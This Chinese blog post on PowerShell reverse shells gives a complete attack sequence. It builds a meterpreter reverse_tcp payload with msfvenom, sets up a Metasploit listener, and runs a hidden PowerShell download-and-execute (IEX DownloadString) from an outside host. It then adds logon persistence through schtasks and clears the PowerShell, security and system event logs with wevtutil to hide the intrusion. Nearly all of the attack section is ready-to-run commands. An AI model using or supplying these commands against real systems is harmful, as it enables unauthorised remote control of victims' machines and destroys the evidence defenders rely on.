PowerShell 反弹渗透技巧
2023-02-18 16:45:55 时间
Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能,并且与现有的WSH保持向后兼容,因此它的脚本程序不仅能访问.NET CLR,也能使用现有的COM技术,同时也包含了数种系统管理工具、简易且一致的语法,提升管理者的管理能力,自Windows 7 开始一直到Windows 10 包括服务器Windows Server 系统中,都将内置 PowerShell,其可作为白名单的一种绕过方式,也让渗透变得更加有趣。
PowerShell 基本反弹
- 生成PowerShell 脚本文件 shell.ps1 并将其放入到Web服务器目录下。
[root@localhost ~]# msfvenom -a x86 --platform Windows \
> -p windows/meterpreter/reverse_tcp \
> -b '\x00\x0b' LHOST=192.168.1.30 LPORT=9999 -f psh-cmd > shell.ps1
[root@localhost ~]# cp -a shell.ps1 /var/www/html/
[root@localhost ~]# systemctl restart httpd
2.MSF运行侦听事件,执行如下命令。
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.30
msf5 exploit(multi/handler) > set lport 9999
msf5 exploit(multi/handler) > exploit -j -z
3.在靶机执行以下命令,即可完成上线。
C://> powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://lyshark.com/shell.ps1');shell.ps1"
C://> powershell.exe wget "http://lyshark.com/shell.exe" -outfile "C:\shell.exe"
C://> schtasks /create /tn "PowerShell" /tr "这里存放待执行任务" /sc ONLOGON 创建计划任务
4.为防止暴露痕迹,在执行完命令后,需要在靶机执行以下命令,清理痕迹.
Microsoft Windows [版本 10.0.17763.316]
(c) 2018 Microsoft Corporation。保留所有权利。
C:\Users\lyshark>wevtutil cl "windows powershell"
C:\Users\lyshark>wevtutil cl "security"
C:\Users\lyshark>wevtutil cl "system"
相关文章
- Linux系列(27) - 三剑客grep、awk、sed
- Linux系列(26) - 强制杀死进程
- Linux系列(25) - 常用快捷键(未更新完)
- 说说Golang goroutine并发那些事儿
- Linux系列(24) - chmod
- Linux系列(23) - echo
- Linux系列(22) - 用户登录查看命令
- Linux系列(21) - 光盘、U盘挂载
- Linux系列(20) - shutdown
- Linux系列(19) - 常用压缩命令(2)
- Linux系列(18) - 常用压缩命令(1)
- Linux系列(17) - >、>>的用法
- Linux系列(16) - 其他帮助命令
- Linux系列(15) - man
- Linux系列(14) - grep
- Linux系列(13) - CentOs 8 配置静态IP
- Linux系列(12) - find
- Linux系列(11) - PATH环境变量
- Linux系列(10) - 命令搜索命令whereis与which
- Linux系列(9) - whoami和whatis